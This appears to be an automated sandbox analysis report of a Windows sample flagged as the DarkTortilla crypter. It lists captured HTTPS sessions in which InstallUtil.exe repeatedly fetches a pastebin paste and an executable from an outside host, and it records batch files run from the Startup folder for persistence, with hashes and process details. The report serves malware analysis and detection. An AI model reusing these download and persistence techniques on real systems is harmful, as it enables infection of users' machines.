                                                2024-08-09 21:02:06 UTC1369INData Raw: 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a
                                                Data Ascii: color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:
                                                2024-08-09 21:02:06 UTC1369INData Raw: 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29
                                                Data Ascii: rAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name)
                                                2024-08-09 21:02:06 UTC  1369  IN
                                                Data Ascii: style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-
                                                2024-08-09 21:02:06 UTC  1369  IN
                                                Data Ascii: ;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="
                                                2024-08-09 21:02:06 UTC  156  IN
                                                Data Ascii: le.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                                                2024-08-09 21:02:06 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                28          192.168.2.6  49751        172.67.19.24    443               4876  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp  Bytes transferred  Direction  Data
                                                2024-08-09 21:02:11 UTC  74  OUT  GET /raw/V6VJsrV3 HTTP/1.1
                                                Host: pastebin.com
                                                Connection: Keep-Alive
                                                2024-08-09 21:02:11 UTC  222  IN  HTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:02:11 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Frame-Options: SAMEORIGIN
                                                Server: cloudflare
                                                CF-RAY: 8b0aaf89a82343b2-EWR
                                                2024-08-09 21:02:11 UTC  1147  IN
                                                Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                2024-08-09 21:02:11 UTC  1369  IN
                                                Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                                2024-08-09 21:02:11 UTC  1369  IN
                                                Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                                2024-08-09 21:02:11 UTC  529  IN
                                                Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                                2024-08-09 21:02:11 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                29          192.168.2.6  49752        188.114.96.3    443               4876  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp  Bytes transferred  Direction  Data
                                                2024-08-09 21:02:12 UTC  65  OUT  GET /RNWPd.exe HTTP/1.1
                                                Host: yip.su
                                                Connection: Keep-Alive
                                                2024-08-09 21:02:12 UTC  920  IN  HTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:02:12 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                memory: 0.36196136474609375
                                                expires: Fri, 09 Aug 2024 21:02:12 +0000
                                                strict-transport-security: max-age=604800
                                                strict-transport-security: max-age=31536000
                                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                x-frame-options: SAMEORIGIN
                                                Cache-Control: max-age=14400
                                                CF-Cache-Status: EXPIRED
                                                Last-Modified: Fri, 09 Aug 2024 21:02:12 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B6M8ihYcl0uPRlt%2FU0vMQCLvEf%2Bw5cQq%2B9%2FwA2IT5jS2YuhEWE%2FPGqB%2Fiz1Geuj7wSJ8D%2B%2BDBaDFW%2FpAmbWUKTZ%2F1HKkdodfaQrrs559CRKY%2B0WD%2F1vuAQk%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b0aaf8daac319eb-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-08-09 21:02:12 UTC  449  IN
                                                Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                                                2024-08-09 21:02:12 UTC  1369  IN
                                                Data Ascii: eta name="revisit-after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon
                                                2024-08-09 21:02:12 UTC  1369  IN
                                                Data Ascii: dius:50%;background-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-web
                                                2024-08-09 21:02:12 UTC  1369  IN
                                                Data Ascii: tData&&navigator.userAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}
                                                2024-08-09 21:02:12 UTC  1369  IN
                                                Data Ascii: _c();</script><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap
                                                2024-08-09 21:02:12 UTC  1369  IN
                                                Data Ascii: th:154px;height:31px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="do
                                                2024-08-09 21:02:12 UTC  176  IN
                                                Data Ascii: Math.random()),a.style.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                                                2024-08-09 21:02:12 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                30          192.168.2.6  49753        172.67.19.24    443               4876  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp  Bytes transferred  Direction  Data
                                                2024-08-09 21:02:17 UTC  74  OUT  GET /raw/V6VJsrV3 HTTP/1.1
                                                Host: pastebin.com
                                                Connection: Keep-Alive
                                                2024-08-09 21:02:17 UTC  222  IN  HTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:02:17 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Frame-Options: SAMEORIGIN
                                                Server: cloudflare
                                                CF-RAY: 8b0aafad9c5dc347-EWR
                                                2024-08-09 21:02:17 UTC  1147  IN
                                                Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                2024-08-09 21:02:17 UTC  1369  IN
                                                Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                                2024-08-09 21:02:17 UTC  1369  IN
                                                Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                                2024-08-09 21:02:17 UTC  529  IN
                                                Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                                2024-08-09 21:02:17 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                31          192.168.2.6  49754        188.114.96.3    443               4876  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp  Bytes transferred  Direction  Data
                                                2024-08-09 21:02:17 UTC  65  OUT  GET /RNWPd.exe HTTP/1.1
                                                Host: yip.su
                                                Connection: Keep-Alive
                                                2024-08-09 21:02:18 UTC  906  IN  HTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:02:17 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                memory: 0.36196136474609375
                                                expires: Fri, 09 Aug 2024 21:02:17 GMT
                                                strict-transport-security: max-age=604800
                                                strict-transport-security: max-age=31536000
                                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                x-frame-options: SAMEORIGIN
                                                Cache-Control: max-age=14400
                                                CF-Cache-Status: HIT
                                                Age: 0
                                                Last-Modified: Fri, 09 Aug 2024 21:02:17 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eYB%2Fr48SBGwlmQp%2BHSJO8dmcLvMTtyHYNh9iiLWdwkxQnrwvxgCVhwbvnY%2Bue0NLm%2FtwvgGvziz0eKzNEboyEelMjdeRnJWaV6U%2BSneGUItOTZBoqSSvBYA%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b0aafb268234217-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-08-09 21:02:18 UTC  463  IN
                                                Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                                                2024-08-09 21:02:18 UTC  1369  IN
                                                Data Ascii: sit-after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta p
                                                2024-08-09 21:02:18 UTC  1369  IN
                                                Data Ascii: round-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-
                                                2024-08-09 21:02:18 UTC  1369  IN
                                                Data Ascii: or.userAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf
                                                2024-08-09 21:02:18 UTC1369INData Raw: 70 74 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62
                                                Data Ascii: pt><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;b
                                                2024-08-09 21:02:18 UTC1369INData Raw: 74 3a 33 31 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69
                                                Data Ascii: t:31px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><di
                                                2024-08-09 21:02:18 UTC162INData Raw: 2c 61 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: ,a.style.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                                                2024-08-09 21:02:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                32 | 192.168.2.6 | 49755 | 172.67.19.24 | 443 | 4876 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-08-09 21:02:22 UTC | 74 | OUT | GET /raw/V6VJsrV3 HTTP/1.1
                                                Host: pastebin.com
                                                Connection: Keep-Alive
                                                2024-08-09 21:02:23 UTC | 222 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:02:22 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Frame-Options: SAMEORIGIN
                                                Server: cloudflare
                                                CF-RAY: 8b0aafd189790f3e-EWR


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                33 | 192.168.2.6 | 49756 | 188.114.96.3 | 443 | 4876 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-08-09 21:02:24 UTC | 65 | OUT | GET /RNWPd.exe HTTP/1.1
                                                Host: yip.su
                                                Connection: Keep-Alive
                                                2024-08-09 21:02:24 UTC | 898 | IN | HTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:02:24 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                memory: 0.36196136474609375
                                                expires: Fri, 09 Aug 2024 21:02:24 +0000
                                                strict-transport-security: max-age=604800
                                                strict-transport-security: max-age=31536000
                                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                x-frame-options: SAMEORIGIN
                                                Cache-Control: max-age=14400
                                                CF-Cache-Status: EXPIRED
                                                Last-Modified: Fri, 09 Aug 2024 21:02:24 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mAIRGSDVmv3di3o0iAKhejJh15pJf03QiQQG0QUt519gG%2BOAITQWoONN7UWRnUpYOf3Bo8HP12Eguts%2B5FZR2DRxTzS6BkjDLzi6wu1v7LlWZqEyrifnWbI%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b0aafdaaee68ce2-EWR
                                                alt-svc: h3=":443"; ma=86400


                                                Target ID:0
                                                Start time:17:00:16
                                                Start date:09/08/2024
                                                Path:C:\Users\user\Desktop\file.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                Imagebase:0xfb0000
                                                File size:9'643'376 bytes
                                                MD5 hash:A7F1B43BB75327181BF5535F6EAB329D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2640143868.0000000003F50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2640143868.0000000003DFB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2641880996.00000000051C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2630838739.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                Target ID:3
                                                Start time:17:00:18
                                                Start date:09/08/2024
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                Imagebase:0xed0000
                                                File size:42'064 bytes
                                                MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:false

                                                Target ID:8
                                                Start time:17:01:02
                                                Start date:09/08/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Q266LY31DJuBkUgU7rnVY9MU.bat" "
                                                Imagebase:0x7ff7d1ec0000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:9
                                                Start time:17:01:02
                                                Start date:09/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff66e660000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:10
                                                Start time:17:01:16
                                                Start date:09/08/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\N7dCpczI2KMQNpAzS7xasjkw.bat" "
                                                Imagebase:0x7ff7d1ec0000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:11
                                                Start time:17:01:16
                                                Start date:09/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff66e660000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:12
                                                Start time:17:01:24
                                                Start date:09/08/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uknphp3q7QNTU5S7JDQd395T.bat" "
                                                Imagebase:0x7ff7d1ec0000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:13
                                                Start time:17:01:24
                                                Start date:09/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff66e660000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:14
                                                Start time:17:01:37
                                                Start date:09/08/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7jqZT4DOBm3RwAn2PcA575yH.bat" "
                                                Imagebase:0x7ff7d1ec0000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:15
                                                Start time:17:01:37
                                                Start date:09/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff66e660000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:16
                                                Start time:17:01:45
                                                Start date:09/08/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aQqevjV3RV9JJaF7h5x7Exf9.bat" "
                                                Imagebase:0x7ff7d1ec0000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:17
                                                Start time:17:01:45
                                                Start date:09/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff66e660000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:18
                                                Start time:17:01:53
                                                Start date:09/08/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pltF0lsLekfh4Kak6kjaROUd.bat" "
                                                Imagebase:0x7ff7d1ec0000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:19
                                                Start time:17:01:53
                                                Start date:09/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff66e660000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:20
                                                Start time:17:02:07
                                                Start date:09/08/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
